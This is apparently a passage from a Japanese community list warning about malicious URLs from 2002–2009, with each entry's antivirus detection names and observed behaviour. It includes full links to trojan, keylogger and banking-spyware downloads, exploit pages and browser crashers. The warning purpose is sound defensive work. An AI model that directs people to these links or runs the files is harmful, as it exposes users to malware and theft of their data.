    「ウィルスが検出されましたが、名前が「JS/BlinkJoke@expl」というものでした。多分大した事無いです。ウィルス対策ソフトが入っていれば殆どの場合問題無いと思います。でもPC有害なので踏まない方が良いです。」


  221. http://www.angelfire.com/rnb/brhom
    [2006/02/05]踏むと こんな感じ のサイトだが、ウィルス名:VBS_HAPTIME.A-1 を検出。別窓は これ
    Kaspersky では Email-Worm.VBS.HappyTime 検出するらしい。
    [2006/03/01]他の方の結果は「ウイルス危険、VBS.Haptime を検出。」


  222. http://www.angelfire.com/sys/popup_source.shtml?search_string=supernintendoroms
    [2004/10/05]angelfireのメンバーページだが、スパイウエア駆除を装ったスパイウエアサイト行きのポプアプが出る。


  223. http://www.angelfire.com/zine2/gusyaneko/shd/
  224. http://www.angelfire.com/zine2/gusyaneko/shd/index2.html
  225. http://www.angelfire.com/zine2/gusyaneko/zenbu/
  226. http://www.angelfire.com/zine2/gusyaneko/zenbu/index1.html
  227. http://www.angelfire.com/zine2/gusyaneko/zenbu/index2.html
    [2004/10/23]無限ループ。mailtoストーム。


  228. http://www.aninavi.jp/spass/p2/service.php?no=E
    [2005/07/23]「update.exe」というファイルをDLできるが、ウィルス反応あり。
    ウィルス名:TROJ_BINJO.B [ ウィルスバスター ]
    ウィルス名:Trojan.Binjo [ ノートン ]
    メールアドレスを盗み取り、通知せずにポルノサービスに登録するトロイの木馬らしい。


  229. http://www.aninavi.jp/spass/p2/service.php?no=P
    [2005/07/22]「update.exe」というWindowsのアイコンをしたアプリケーションをDLできるが、ウィルス名:TROJ_BINJO.Bを検出。
    ユーザーがもし間違って開くと・・・ (2chでのレスを編集)
    1、起動する。
    2、その後ダウンロードウィンドウが出る。
    3、画像・新しくhtmlファイルが作成されている。※画像はエロい。もうひとつは不明。
    4、その後勝手に入会処理される。期日は●日とか何たらこんたらメールのリンクとが出るがメールなんか送らないように。メルアドがばれる。


  230. http://www.another.jp/rental/bbs/bbs2.asp?ID=mizumoto1
    [2005/06/27]「Fuzzy Family」というBBSだが、悪意ある投稿者により、ウィルス憑き疑惑サイトを呼んでいる。


  231. http://www.antiblock.biz/user63/counter.htm
    [2004/12/11] ウィルス名:HTML_REDIR.A+JS_OBJDATA.A+JAVA_BYTEVER.A
    JavaScriptが有効なら 2DimensionOfExploitsEnc.php を持って来られるので注意。
    [2004/12/12] /user**/の 63 の数字は他に 121、164、202、256、311 の5つを確認。全て上記ウィルスの反応あり。
    また、/user121/ではこの gif画面 表示。画面全体がリンクになっている。
    このgif画面では踏むと //umaxsearch.com/search.php?aid=31162&q=spyware に飛ぶ。


  232. http://www.antispy.biz/downloads/i_bpk_bosnian.exe
    [2005/11/13]ウィルス名:SPYW_PERFLOG.145


  233. http://www.antispy.biz/downloads/i_bpk_bulgarian.exe
    [2005/11/13]ウィルス名:SPYW_PERFLOG.154


  234. http://www.antispy.biz/downloads/i_bpk_czech142.exe
    [2005/11/13]ウィルス名:SPYW_PKEYLOG.C


  235. http://www.antispy.biz/downloads/i_bpk_dutch.exe
    [2005/11/13]ウィルス名:SPYW_PERFLOG.162


  236. http://www.antispy.biz/downloads/i_bpk_dutch144.exe
    [2005/11/13]ウィルス名:SPYW_PERFLOG.144


  237. http://www.antispy.biz/downloads/i_bpk_german.exe
    [2005/11/12]ウィルス名:SPYW_PKEYLOG.C


  238. http://www.antispy.biz/downloads/i_bpk_hungarian.exe
    [2005/11/13]ウィルス名:SPYW_PERFLOG.14


  239. http://www.antispy.biz/downloads/i_bpk_romanian.exe
    [2005/11/13]ウィルス名:SPYW_PKEYLOG.C


  240. http://www.antispy.biz/downloads/i_bpk_slovenian.exe
    [2005/11/13]ウィルス名:SPYW_PERFLOG.153


  241. http://www.antispy.biz/downloads/inst_swpr.exe
    [2005/11/13]ウィルス名:SPYW_WEBPAGREC.A


  242. http://www.antitero.tk/postcard.gif.exe
    [2006/09/01]バスター無反応だが、以下のアンチウィルスソフトで反応。
    AntiVir → TR/Zapchas.F
    Authentium → could be a corrupted executable file
    Avast → Win32:Parite
    AVG → IRC/BackDoor.Flood
    ClamAV → W32.Parite.B
    DrWeb → Win32.Parite.2
    Fortinet → IRC/Zapchas.BX!tr
    NOD32v2 → IRC/Zapchast.L
    Norman → Zapchast.LS
    Sophos → Troj/Zapchas-BX
    VBA32 → Trojan.IRC.Zapchast.L#5
    2006/08/13 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、「破損ファイルであり、調査不可」とのこと。


  243. http://www.apornmovie.com/PORN_DVD_RIPz/
    [2004/12/18] ウィルス名:HTML_REDIR.A+JAVA_BYTEVER.A+JS_SMALL.D+JS_OBJDATA.A
    踏むとディレクトリ丸見えで多くの動画が置いてあるが //vesbiz.biz/adverts/01/1.htm を読みに行き、その間フリーズ。
    また、dialarをインストールするようセキュリティ警告が連発する。アラート表示もあり。
    すべて拒否し続けると遂には下のアドレスで「ページを表示できません」となる。
    url:ms-its:C:\WINDOWS\Help\iexplore.chm::/iegetsrt.htm
    [2005/02/14]ディレクトリのどれでもクリック(右クリックでも左クリックでも)すると、「ICOO LOADER」をDLしろって案内が出て「OK」を押すとDLサイトに飛ぶ。
    どうやら検索系のアプリがDLできるらしいが使い方不明。
    exeファイルがあったのでDLして実行したがが英語ばかりで読めず使えず。
    ただし、スパイウェアなどは感知されずウイルスもない様子。
    レジストリの改竄もないようなので、恐らく「ICOO LOADER」自体はまともなアプリと思われる。
    [2005/02/15]踏むとディレクトリ丸見えで多くの動画が置いてあるが以前の[2004/12/18]の時と違ってウィルス反応無し。
    直踏みでは こんな感じの画面 。リンク以外の画面を右クリックすると この選択窓 を表示。
    選択窓で「OK」を押すと //www.icoonet.com/?shtm に飛ぶ。「キャンセル」を押すと何もなし。
    しかし、画面 では「http://205.177.122.27/docs/zzz/doc.php を開いています」と下に出ている。
    //205.177.122.27/docs/zzz/doc.phpに行ってみると真っ白なページだが微妙に怪しい。
    ソースを見ると//205.177.122.27/docs/zzz/l4.exeを実行しようとしているのが分かる。
    このexeからウィルス名:TROJ_DLOADER.VEを検出。


  244. http://www.apple.com/jp/support/ipod/five_rs/
    [2006/07/02]こんな感じ のページだが、何回確認してもIEが落ちる。
    [2006/07/02]他の方の結果では「アップルのサポートセンターですが、IEのエラーが起こりますね。障害かもしれません。」


  245. http://www.aquelas.com/
    [2007/04/05]海外アダルトサイト。お気に入りへの登録をしろ、としつこくしてくる。
    バスター無反応だが、他社製アンチウィルスソフトでは反応があると思われる。
    [2008/08/09]他の方の結果では、
    「海外アダルトサイトなどが次々と開かれ、お気に入りに登録しようとしたり、アラートが表示されたり、他のページへ飛ばそうとしたりするようです。
    IEを強制終了して閉じました。McAfee SiteAdvisor ではブラウザ攻撃判定で遮断されます。」


  246. http://www.aqweb.net/~boukansya/
    [2006/05/22]他の方の結果は以下の「」内。
    「Aqweb.netという海外サーバの検索サイトに繋がりますが、挙動がかなり不審です。
    ウインドウを閉じる際、広告ポップがゾンビで新窓表示されます。(IEのセキュリティ高で回避できますが)
    ソースでも異様に沢山のsetcookieを発見しました。検索結果も公平では無い様です。
    当方PC無害ですが閲覧は回避したほうがよいでしょう。」


  247. http://www.aqweb.net/~cronous/
    [2004/06/16]//www.raus.de/crashme/に飛ぶ。


  248. http://www.ardamax.com/setup_akll.exe
    [2005/11/12]ウィルス名:SPYW_ARDAKEY.B


  249. http://www.armbender.com/UCSearch.CAB
    [2005/04/17]ウィルス名:TROJ_VB.AN


  250. http://www.aroundweb.com/gal.php
    [2004/07/28]//69.50.190.131/?to=pose&from=spb をFRAMEタグで呼ぶ。


  251. http://www.articlelin.com/flash081205/
  252. http://www.articlelin.com/flash081205/index.htm
    [2009/03/21]真っ白なページだが、ウィルス名:JS_AGENT.ANLE を検出。


  253. http://www.artmanhas.com.br/imagens/animados/cartao.scr
    [2006/08/13]ウィルス名:TROJ_BANLOAD.BCI


  254. http://www.artrainternational.com/.cartao/humortadela.scr
    [2006/08/13]ウィルス名:TROJ_VB.UC


  255. http://www.asahi-net.or.jp/~cw6h-otk/blackhole.html
    [2002/12/27]奥まで進むとある種ブラクラのようなウィンドウが沢山が開くサイト。


  256. http://www.aseel1.com/html/modules/4nAlbum/public/folhaonline/dossiept/dossieptdoc.scr
  257. http://www.aseel1.com/html/modules/4nAlbum/public/folhaonline/dossiept/video_geraldoalckmim.wma.scr
    [2007/01/15]2007/01/08 にトレンドマイクロ社に上記2つのファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TSPY_BANKER.FVK として検出するよう対応、とのこと。
    実際に 2007/01/08 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TSPY_BANKER.FVK を検出することを確認。
    2007/01/08 から今日まではファイルは置き換えられていないと推測される。


  258. http://www.asian-lolita.sexwww.info/
    [2005/03/31]踏むと このセキュリティ警告 が2回。
    その後、ウィルス名:JS_MHTREDIR.F+JAVA_BYTEVER.A+JAVA_BYTEVER.C+JS_EXCEPTION.GENを検出。
    検出後、この小窓 を表示。「OK」を選ぶと再び、セキュリティ警告を表示。「キャンセル」を選ぶと何もなし。


  259. http://www.atelys.com/3rdparty/Installer.exe
    [2005/04/04]ウィルス名:TROJ_GOLDENP.A


  260. http://www.atelys.com/src/dpcproxy.exe
    [2005/10/22]ウィルス名:TROJ_NZ.A


  261. http://www.atelys.com/src/Speedup.ocx
    [2005/04/17]ウィルス名:TROJ_AGENT.BU


  262. http://www.atomiclog.com/atomiclog23.exe
    [2006/05/07]ウィルス名:SPYW_ATOMIC.B


  263. http://www.atomiclog.com/download.html
    [2006/05/07]スパイウェア配布サイト。こんな感じ のサイト。このページ表示まで無害で普通に閉じれる。
    このページ内の「AtomicLog 2.3」というリンクをクリックすると以下のexeをDL出来るが、ウィルスを検出。
    //www.atomiclog.com/atomiclog23.exe


  264. http://www.atwikisjp.com/user/3522938.zip
    [2009/05/09]DL+解凍すると「3522938.exe」ファイルが現れるが、ウィルス名:TSPY_MAGANIA.HZ を検出。
    ファイルサイズ:42.1 KB


  265. http://www.auadvertising.biz/
    [2008/10/26]こんな感じ のサイト。確認すると、このサイトは怪しい挙動がある。
    一瞬、以下の @ に飛び、その後すぐに以下の A に飛び、真っ白なページを表示するが、以下の B のファイルを開こうとする。その後、google へ飛ぶ。
    @、//musichouseworld.info/in.cgi?default
    A、//72.232.11.210/~vladiman/img/index.php
    B、//72.232.11.210/~vladiman/img/cache/doc.pdf
    [2008/10/26]他の方の結果は以下の「」内。
    「アドオン実行警告後、google へ飛ばされるようです。ClamWin で Exploit.PDF-14 を検出。」


  266. http://www.avatarresources.com/dist/ast_4_mm.exe
    [2005/04/17]ウィルス名:ADW_DOWNLD.A


  267. http://www.avsweb.com/momdownload/momsetup.exe
    [2005/11/20]ウィルス名:SPYW_MOM.138
    スパイウェアの一種:キーロガーで、ディスクトップ画面のスクリーンショットを撮られ、検索サイトでのキーワードも監視される。


  268. http://www.avtw1068.com/asp/west.com
    [2006/03/24]他の方の結果では「Win32:Trojan-gen. {UPX!} というウイルスを検出。」


  269. http://www.avtw1068.com/dv-as/index.htm
    [2006/08/20]踏むと、アダルト画像のページだが、環境によりウィルス名:TROJ_DLOADER.BZQ を検出する。
    マカフィーではトロイの木馬(Downloader-ATP)を検出するらしい。
    ソースを見るとIFRAMEタグで以下のURLを呼び出している。
    //www.lovetw.webnow.biz/yan/realx.htm


  270. http://www.aw.org.ru/portal/includes/.card/A.zip
    [2007/05/19]2007/01/06 にトレンドマイクロ社に中身の「SeuCartao.scr」ファイルを提出。
    2007/01/12 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。
    実際に 2007/01/06 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。
    2007/01/06 から今日までのファイルの置き換えは無いと推測される。


  271. http://www.aw.org.ru/portal/includes/.card/copa.zip
    [2007/05/19]2007/01/06 にトレンドマイクロ社に何故か解凍できなかったため、zipファイルのままファイルを提出。
    2007/01/12 にその結果の連絡があり、ウィルス名:TSPY_BANCOS.JV として検出するよう対応、とのこと。
    実際に 2007/01/06 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TSPY_BANCOS.JV を検出することを確認。
    2007/01/06 から今日までのファイルの置き換えは無いと推測される。


  272. http://www.aw.org.ru/portal/includes/.card/Seu_Cartao.scr
    [2007/05/19]2007/01/06 にトレンドマイクロ社にファイルを提出。
    2007/01/12 にその結果の連絡があり、ウィルス名:TROJ_SMALL.BZG として検出するよう対応、とのこと。
    実際に 2007/01/06 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_SMALL.BZG を検出することを確認。
    2007/01/06 から今日までのファイルの置き換えは無いと推測される。


  273. http://www.aw.org.ru/portal/includes/juhhfeio.exe
    [2007/05/19]2007/01/06 にトレンドマイクロ社にファイルを提出。
    2007/01/12 にその結果の連絡があり、ウィルス名:TROJ_DELF.CEK として検出するよう対応、とのこと。
    実際に 2007/01/06 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_DELF.CEK を検出することを確認。
    2007/01/06 から今日までのファイルの置き換えは無いと推測される。


  274. http://www.aw.org.ru/portal/includes/juhhfeio.zip
    [2007/05/19]ウィルス名:TROJ_DELF.CEK


  275. http://www.aw.org.ru/portal/includes/sunroot.tar
    [2007/01/06]ウィルス名:TROJ_Generic


  276. http://www.awmdabest.com/267/3/2/
    [2005/07/30]ウィルス名:JAVA_BYTEVER.A


  277. http://www.awmdabest.com/493/3/2/
    [2005/01/30]ウィルス名:JAVA_BYTEVER.A。//www.awmdabest.com/jar/493/archive.jar を実行しようとする。


  278. http://www.awmdabest.com/bltd/422.chm
    [2006/08/05]2006/07/24 にトレンドマイクロ社に「422.chm」ファイルを提出。
    トレンドマイクロ社から連絡は無かったが、対応してくれた模様。
    今日、当該URLからDLしみると、ウィルス名:CHM_CODEBASE.BY として検出。


  279. http://www.awmdabest.com/bltd/452.chm
    [2006/09/07]2006/08/20 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.DC として検出するよう対応、とのこと。
    2006/08/20 にDLしたファイルからウィルス名:CHM_CODEBASE.DC を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:CHM_CODEBASE.DC を検出することを確認。


  280. http://www.awmdabest.com/cabd/959/dial.cab
    [2006/08/22]ウィルス名:TROJ_MULTDROP.CN


  281. http://www.awmdabest.com/djar/728/archive.jar
    [2005/02/26]ウィルス名:JAVA_BYTEVER.A


  282. http://www.awmdabest.com/jar/124/archive.jar
  283. http://www.awmdabest.com/jar/267/archive.jar
  284. http://www.awmdabest.com/jar/493/archive.jar
    [2005/07/30]ウィルス名:JAVA_BYTEVER.A


  285. http://www.axa.ne.jp/imgbbs/imgboard.cgi
    [2004/12/15] 画像掲示板だが悪意ある投稿者により//freetop.ru/?mを呼ぶ書き込みがされている。
    そのため、環境によりスタートページが//213.159.117.134/index.php になったり、海外のアダルトサイトのアイコンが勝手に登録される場合あり。


  286. http://www.aylp.net/internet/browser_crasher/telnet.html
    [2006/12/31]TELNETストーム。


  287. http://www.azebar.com/
    [2005/11/12]こんな感じ のスパイウェア配布サイト。このページ表示まで無害。


  288. http://www.azebar.com/install/azesearch.cab
    [2005/11/12]DLまでバスター無反応。解凍するとウィルス名:ADW_AZESEARCH.E を検出。